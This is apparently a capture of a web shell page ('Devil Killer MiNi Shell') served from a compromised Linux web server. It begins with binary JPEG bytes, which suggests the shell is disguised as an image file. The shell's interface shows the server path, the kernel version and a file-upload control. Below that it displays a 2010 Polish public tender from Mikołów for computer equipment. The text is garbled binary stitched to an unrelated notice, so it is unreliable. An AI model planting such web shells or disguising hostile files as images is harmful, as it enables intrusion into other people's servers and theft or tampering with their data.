JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100913/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100913/249623-N-2010.html

<p class="kh_header"><b>Mikołów: Dostawa nowego sprzętu komputerowego na potrzeby Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego w Mikołowie realizowanego w ramach projektu pn. Rozbudowa Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego w Mikołowie</b><br>
<b>Numer ogłoszenia: 249623 - 2010; data zamieszczenia: 13.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Mikołów , ul. Rynek 16, 43-190 Mikołów, woj. śląskie, tel. 032 3248500, faks 032 3248400.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mikolow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa nowego sprzętu komputerowego na potrzeby Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego w Mikołowie realizowanego w ramach projektu pn. Rozbudowa Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego w Mikołowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa nowego sprzętu komputerowego na potrzeby Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego w Mikołowie realizowanego w ramach projektu pn. Rozbudowa Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego w Mikołowie.
Projekt realizowany jest w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, Priorytet V. Środowisko, Działanie 5.5 Dziedzictwo przyrodnicze.
Celem projektu pn. Rozbudowa Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego w Mikołowie jest zwiększenie świadomości społeczeństwa na temat ochrony środowiska naturalnego, rozpropagowanie idei Śląskiego Ogrodu Botanicznego w Mikołowie oraz zwiększenie świadomości społeczeństwa na temat udziału środków Unii Europejskiej w projektach realizowanych ze środków RPO WSL 2007-2013 na terenie Województwa Śląskiego.
W ramach zamówienia należy zakupić i dostarczyć do siedziby Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego w Mikołowie:
1. komputer z oprogramowaniem- 12 sztuk, procesor dwurdzeniowy min. 2,8 Ghz, obudowa typu Tower, zasilacz min. 400 Watt, pamięć RAM min. 4 GB z możliwością rozbudowy do 8GB, dysk twardy min. 500 GB min. 7200 obr./min, płyta główna z chipsetem, który musi być wspierany przez systemy operacyjne Windows/Linux/MAC lub równoważny oraz musi być zgodna z parametrami procesora tj. musi wykorzystywać jego parametry wydajnościowe i właściwości oszczędzania energii, karta graficzna min 512MB, wbudowany napęd DVD-RAM z funkcją nagrywania i oprogramowaniem w języku polskim- min. 8x, min. 3 porty USB, karta sieciowa min.100/1000Mbit/s, karta dźwiękowa zintegrowana z płytą główną, system operacyjny typu MS Windows Windows 7 z licencją wersja min. 32 Bit, z wszystkimi niezbędnymi do poprawnej pracy sterownikami, niewymagającymi aktywacji za pomocą telefonu lub internetu lub równoważny system operacyjny umożliwiający prawidłową pracę komputera w wersji min. 32 bitowej z wszystkimi niezbędnymi do poprawnej pracy sterownikami, niewymagającymi aktywacji za pomocą telefonu lub internetu ,oprogramowanie biurowe typu MS Word, MS Exel, MS PowerPoint z licencją lub równoważne umożliwiające utworzenie, odtworzenie plików tekstowych i rachunkowych oraz prezentacji z licencją, porty wejścia/wyjścia, mysz, listwa zasilająca, klawiatura, norma CE, min. 24 miesięczna gwarancja.

2. monitor -12 sztuk, monitor min. 17- calowy panel LCD z rozdzielczością min. 1440x900 wszystkie niezbędnymi do poprawnej pracy sterownikami, czas reakcji odświeżania maksymalnie 5 ms, złącze wejściowe zgodne z oferowanym komputerem, norma CE, min. 24 miesięczna gwarancja;

3.  laptop z oprogramowaniem: sztuk 2, procesor-dwurdzeniowy min. 2 GHz, FSB min.677, cache L2 min. 2 MB, pamięć RAM min. 4 GB z możliwością rozbudowy do 8GB, dysk twardy min. 320 GB, karta graficzna min. 256 MB umożliwiająca pokaz prezentacji multimedialnych, karta dźwiękowa, wbudowany napęd DVD-RAM z funkcją nagrywania i oprogramowaniem w języku polskim- min. 8x, bezprzewodowa karta sieciowa i modem, wyświetlacz min. 15,4-calowy panel LCD z rozdzielczości min. 1280x800, min. 2 porty USB, wbudowany czytnik kart SD, system operacyjny typu MS Windows Windows 7 z licencją wersja min. 32 Bit z wszystkimi niezbędnymi do poprawnej pracy sterownikami, niewymagającymi aktywacji za pomocą telefonu lub internetu lub równoważny system operacyjny umożliwiający prawidłową pracę komputera w wersji min. 32 bitowej z wszystkimi niezbędnymi do poprawnej pracy sterownikami, niewymagającymi aktywacji za pomocą telefonu lub internetu ,oprogramowanie biurowe typu MS Word, MS Exel, MS PowerPoint z licencją lub równoważne umożliwiające utworzenie, odtworzenie plików tekstowych i rachunkowych oraz prezentacji z licencją, wbudowana kamera internetowa, porty wejścia/wyjścia (monitor wewnętrzny, mikrofon, słuchawki, głośniki, line-in, modem, zasilacz sieciowy), czas pracy baterii min. 2h, ochrona antywirusowa min. 2 letnia licencja, mysz i torba na laptop, Certyfikat- dokument potwierdzający zgodność laptopa z normą CE, dokument potwierdzający poprawną współpracę laptopa z systemem operacyjnym MS Windows Windows 7 lub równoważnym systemem operacyjnym umożliwiającym prawidłową pracę komputera w wersji min. 32 Bit, min. 24 miesięczna gwarancja na laptop.

4. drukarka laserowa monochromatyczna:  6 sztuk, 
- Technologia druku: monochromatyczny druk laserowy,
- Rozmiary papieru:	maks. A4,
- Formaty nietypowe mniejsze	dopuszczalne, 
- Wymagane interfejsy min.	USB 2.0, ethernet, 
- Rozdzielczość druku mono:	min. 1200x1200 dpi,
- Pamięć standardowa:		min. 32 MB,
- Szybkość druku mono:		min. 30 strony A4/minutę,
- Szybkość druku dwustronnego:		min. 15 stron A4/minutę,
- Podawanie papieru:	Podajnik podstawowy: do 150 stron. Dopuszczalny także dodatkowy podajnik lub wielofunkcyjna szczelina do pobierania pojedynczych arkuszy lub podajnik ręczny,
- Obsługiwane systemy operacyjne:	MS Windows XP, Vista, Windows 7 lub równoważny system operacyjny umożliwiający prawidłową pracę komputera z drukarką
- Obsługiwane języki:		PCL5e, PCL6,
- Dołączone oprogramowanie:	sterowniki, przewodnik użytkowania,
- Dołączone kable:	sieciowy, USB,
- Druk dwustronny automatyczny:	Tak, 
- Gwarancja:	Min. 24 miesiące

5. drukarka atramentowa:  5 sztuk,
-Rozdzielczość druku:	maks. 9600 x 2400 dpi,
- Metoda drukowania:	Drukarka atramentowa z maks. 5 atramentami, minimalna objętość kropli 1 pl, głowica drukująca typu FINE,
- Szybkość drukowania z jakością foto-labu Zdjęcie 10 x 15 cm bez obramowania:	min. 20 sekund,
- Szybkość drukowania mono ESAT:	min.  9obr./min,
- Szybkość drukowania w kolorze ESAT:	min.8 obr./min,
- Konfiguracja wkładów z atramentami:	Technologia oddzielnych zbiorników z atramentem - maks. 5 odrębnych zbiorników,
- Typy nośników	Zwykły papier, koperty, papier Photo Paper Pro Platinum (PT-101), papier 	 Photo Paper Pro II (PR-201), papier Photo Paper Plus Glossy II (PP-201),    papier Photo Paper Plus Semi-gloss (SG-201), papier Glossy Photo Paper,   papier Matte Photo Paper (MP-101), papier High Resolution Paper (HR- 101N), nośnik T-shirt Transfer (TR-301), naklejki Photo Stickers (PS-101),
- Podawanie nośnika- tylna taca:	maks. 150 kartek,
- Taca DVD/CD:	1 dysk DVD lub CD z możliwością nadruku,
- Formaty nośników- tylna taca:	A4, B5, A5, Letter, Legal, koperty (format DL lub Commercial 10), 10 x 15 cm, 13 x 18 cm, 20 x 25 cm Kaseta: A4, B5, A5, Letter
Drukowanie dwustronne (dupleks) Dostępne dla formatu:	A4, B5, A5 i Letter,
-Typ interfejsu:	PC USB Hi-Speed (Port B),
-Typ interfejsu - aparat fotogr. Port drukowania bezpośredniego:bezpośrednie drukowanie zdjęć z aparatów i kamer zgodnych ze standardem PictBridge
- Poziom hałasu drukowanie:	maks. 47 dB,
-Zasilanie- napięcie przemienne:	100-240 V, 50/60 Hz,
- Gwarancja:	Min. 24 miesiące

6.  drukarka wielofunkcyjna wraz z modułem kopiowania 1 szt.
- Czas nagrzewania 	maks. 26 sek.,
- Czas uzyskania pierwszej kopii	maks. 7 sek.,
- Rozdzielczość	min. 600 dpi x 600 dpi,
- Szybkość kopiowania	A4 25 str./min. A3 15 str./min,
- Maksymalny format oryginału	A3,
- Zoom		50 - 200%,
- Pojemność papieru	2 x 250 kartek,
- Pojemność podajnika papieru	80 kartek,
- Maksymalna pojemność papieru	1.080 kartek,
- Gramatura papieru - kaseta	64 - 90 g/m2,
- Gramatura papieru - podajnik	64 do 128g/m2, 
- Ilość kopii	1-99,
- Duplex  standard,TAK,
- Wymiary	maksymalnie 622 x 638 x 665,4 mm, +/- 5mm,
- Waga	maksymalnie 47 kg,
- Zasilanie	220V AC do 240V AC 10% (50/60Hz),
- Zużycie energii	Max 1,5 kW,
- Szybkość wydruku	25 str./min,
- Język opisu strony	UFRII LT, PCL 5e, PCL 6,
-Standardowa pamięć drukarki	min. 256 MB,
- Rozdzielczość		min. 1200 dpi x 600 dpi,
- Rozmiar wydruku	A4, A3,
- Interfejsy	Ethernet (100Base-TX/10Base-T), USB 2.0,
- Wspierane systemy operacyjne	Windows 98/Me/2000/XP/2003 Serwer/Vista, Windows 7, MAC, Linux lub równoważny system operacyjny umożliwiający prawidłową pracę komputera z drukarką,
- Automatyczny podajnik		Tak, w zestawie,
- Materiały eksploatacyjne Toner (min. 15 tys. kopii) bęben (min. 55 tys. kopii),
- Podstawka	Tak
- Gwarancja:	Min. 24 miesiące

7. stacja graficzna: 1 sztuka, w skład stacji wchodzi- zestaw komputerowy, monitor, oprogramowanie graficzne:
Wymagania minimalne lub równoważne umożliwiające prawidłową pracę stacji graficznej:
- Procesor: 2x procesor cztero-rdzeniowy o prędkości 2,66 GHz, FSB 1366, 8 MB cache,
- Pamięć RAM:	DDR3 PC 1066,
- ilość pamięci:	6 GB (3x2GB),
- Karta muzyczna	Zintegrowana,
- Właściwości karty graficznej:
Podwójne złącze DVI	1, 
Ilość rdzeni procesora	64, 
Liczba wyjść cyfrowych	3,
DisplayPort	2,
Liczba wyjść analogowych 1,
Analogowych i cyfrowych	Tak,
Maksymalna cyfrowa rozdzielczość wyświetlania  @ 60Hz	2560x1600 ,
Całkowita ilość pamięci	1024 MB,
Typ pamięci	256-bit GDDR3
Przepustowość pamięci min.(GB/s)	51,
Relatywny współczynnik wydajności min.	63,
FSAA (maksymalne)	32x,
Shader Model	4.0,
OpenGL	3.0,
DirectX	10,
Chłodzenie	1 slot,
Obsługa SLI Frame Rendering 	Tak,
Obsługa EnergyStar 	Tak,
Maksymalna moc karty graficznej	110W,
- Wewnętrzne dyski twarde - 2 szt.	min. 500 GB,
- szybkość dysku	min. 7200 obr/min,
- CD-ROM i DVD	min.DVD +/- RW ,
- Kontroler dysku twardego	4xSAS/SATA II, RAID 0/1,
- zewnętrzne porty I/O	min. 2 przednie gniazda USB 2.0 i 6 tylnych gniazd USB 2.0;
- Klawiatura	Standardowa klawiatura,
- Mysz	Dwuprzyciskowa mysz laserowa, 
- Interfejs sieciowy	Zintegrowany,
- Oprogramowanie (system operacyjny)	MS WindowsR 7 Professional PL,
- Oprogramowanie (pakiet biurowy)	MS Office 2010 H&B,
- Oprogramowanie (pakiet graficzny)	Corel Draw x5 PL,
- Przekątna ekranu	22,
- Rozdzielczość naturalna	1680 × 1050,
- Współczynnik kontrastu	1200:1,
- Jasność	350 cd/m2,
- Kąty widzenia	178° w pionie i w poziomie,
- Cyfrowe/analogowe złącza sygnałowe	Tak,
- Zasilacz	min. 500 W,
- Norma 	CE,
- Gwarancja	min. 24 miesiące

8. serwer bazodanowy: sztuk 1, liczba procesorów: minimum 1, obsługa minimalnie dwóch procesorów, procesor: minimum 3,2 Ghz, dostępna liczba rdzeni procesora minimum: 2, częstotliwość pracy szyny minimum FSB 800MHz, pojemność pamięci cache: minimum 4GB, zestaw układów płyty głównej: kompatybilny z procesorem, maksymalna pojemność pamięci 16 GB, gniazda pamięci minimum 6 gniazd DIMM, pamięć: buforowane moduły pamięci rejestrowanej DIMM PC2-5300 (DDR2-667), pamięć zainstalowana(RAM) minimum 4GB DDR ECC, minimum 6 gniazd rozszerzeń: 2 gniazda PCI-Express x8, 3 gniazda PCI-Express x4 (złącze x8) i jedno gniazdo PCI (32-bitowe/33 Mhz), karta sieciowa: wbudowany adapter serwera Gigabit 10/100/1000 z funkcją WOL (Wake on LAN), oprogramowanie do zarządzania serwerem: karta zdalnego zarządzania, kontroler pamięci masowej w modelu z dyskami SATA/SAS: kontroler SAS SC40Ge PCI Express lub 4-portowy kontroler HBA SATA/SAS, model Performance: kontroler Smart Array E200/128 BBWC SATA/SAS, zainstalowane dyski SATA: minimum 2x250GB, napęd: DVD, karta graficzna zintegrowana z płytą główną, porty minimum: Parallel x1, Serial x1, PS2 x2, Keyboard (PS2) x1, USB 2.0 Ports x3, Lan RJ45 x2, obudowa: Tower 5u, zasilacz: minimum 460 Watt, okablowanie, masa całkowita maksymalnie 30 kg, obsługiwane systemy operacyjne:  Microsoft Windows Server, Microsoft Windows Server Hyper-V, Red Hat Enterprise Linux, SUSE Linux Enterprise Server, Oracle Enterprise Linux (OEL), Solaris 10 for x86/x64 based Systems, VMware ESX, HP Citrix Essentials for XenServer lub lub równoważny system operacyjny umożliwiający prawidłową pracę serwera, monitor LCD 17 rozdzielczość natywna maksymalna 1280x1024, odświeżanie max 75Hz, matryca LCD TFT, czas odświeżania maksymalnie 8ms, okablowanie w komplecie, gwarancja minimum 24 miesiące. 

9. switch 24 portowy: 2 sztuki, interfejsy LAN: 10/100/1000 Mbps RJ-45, ilość portów LAN: min. 24 szt., obsługiwane protokoły: IEEE 802.3 (Ethernet), IEEE 802.3u (Fast Ethernet), IEEE 802.1d (bridging), IEEE 802.3x (flow control), maksymalna: szer. x wys. x głęb. - 440 x 44 x 137 mm - waga:  1.96 kg, dodatkowe informacje: min. pamięć 32000 MAC adresów, store-and-forward, mocowanie typu RACK 1U 19, 2 sloty (4 sztuki) na dodatkowe moduły 1 Gb gniazda SFP.

10. switch 5 portowy: 1 sztuka, interfejsy LAN: 10/100/1000 Mbps RJ-45, ilość portów LAN: min. 5 szt., obsługiwane protokoły: IEEE 802.3 (Ethernet), IEEE 802.3u (Fast Ethernet), IEEE 802.1d (bridging), IEEE 802.3x (flow control).

11. access Point PoE: 3 sztuki, standard IEEE 802.11F, IEEE 802.3/u, IEEE 802.1p, IEEE 802.11e, IEEE 802.11i, 	IEEE 802.1X, IEEE 802.1q, IEEE 802.3af, IEEE 802.11b/IDEE, typ modulacji DSSS, ODM, moc wyjściowa min. 18.00 dBm, prędkość transmisji min. 54 Mbps, LAN 10/100 Mb/s, możliwość zamontowania anteny zewnętrznej, roaming, konfiguracja przez www, tryby pracy point-to-multipoint Bridge Mode, point-to-point Bridge Mode, Repeter; Access Point szyfrowanie WEP: 64bit/128bit, WPA-PSK/WPA-ENT, WPA2-PSK/WPA2-ENT, szerokość maksymalna 170.00 mm, wysokość maksymalna 205.00 mm, głębokość maksymalna 195.00 mm, temperatura pracy dopuszczalna 0-40 °C, power over Ethernet, gwarancja min. 24 miesiące 

12. UPC 1000 VA: moc wyjściowa min.: 1000 VA, moc wyjściowa min.: 670 W, napięcie wejściowe 230 V, częstotliwość 50Hz,kształt napięcia wyjściowego sinusoidalny, filtracja napięcia wyjściowego filtr przeciwzakłóceniowy RFI/EMI, tłumik, warystorowy, zabezpieczenie przeciążeniowe bezpiecznik topikowy, zabezpieczenie przeciwzwarciowe i przeciążeniowe akumul. elektroniczne, czas podtrzymania min. 6,1 - 20,6 min., czas przełączania na UPS maks. 5 ms, ilość gniazd wyjściowych min. 8 szt., sygnalizacja optyczno akustyczna, wymiary maksymalne 440 x 220 x 170 mm, waga maksymalna 19 kg, dodatkowe informacje SmartSlot, dodatkowo komplet kabli dla wszystkich gniazd wyjściowych.

13. 5A: listwa zasilająca (acar) sztuk 1 kolor czarny długość przewodu minimum 3 metry, min. 5 gniazd.

14. 5B: listwa zasilająca (acar) sztuk 1 kolor czarny długość przewodu minimum 3 metry, 
min. 5 gniazd zakończony końcówką do wpięcia do UPC.

Dostarczony sprzęt komputerowy powinien zawierać w formie samoprzylepnej plakietki z obowiązującym zestawem znaków graficznych: Narodowych Strategicznych Ram Odniesienia 2007-2013, Województwa Śląskiego oraz Unii Europejskiej (w kolejności tutaj podanej) oraz opis w postaci Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 a także hasło programu Regionalny Program Operacyjny Województwa Śląskiego-realna odpowiedź na realne potrzeby Dodatkowo plakietka powinna zawierać tytuł projektu tj. Rozbudowa Centrum Edukacji Przyrodniczej i Ekologicznej Śląskiego Ogrodu Botanicznego w Mikołowie a także zdanie: Zadanie zrealizowane przez Gminę Mikołów. Zamieszczone loga powinny być w tej samej wielkości. Wielkości plakietki min. 45 mm x 110 mm. Treść i szata graficzna plakietki winna być uzgodniona z Zamawiającym oraz spełniać wymogi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla Beneficjentów w zakresie Informacji i Promocji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 48.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak przepisów nakładających obowiązek posiadania uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
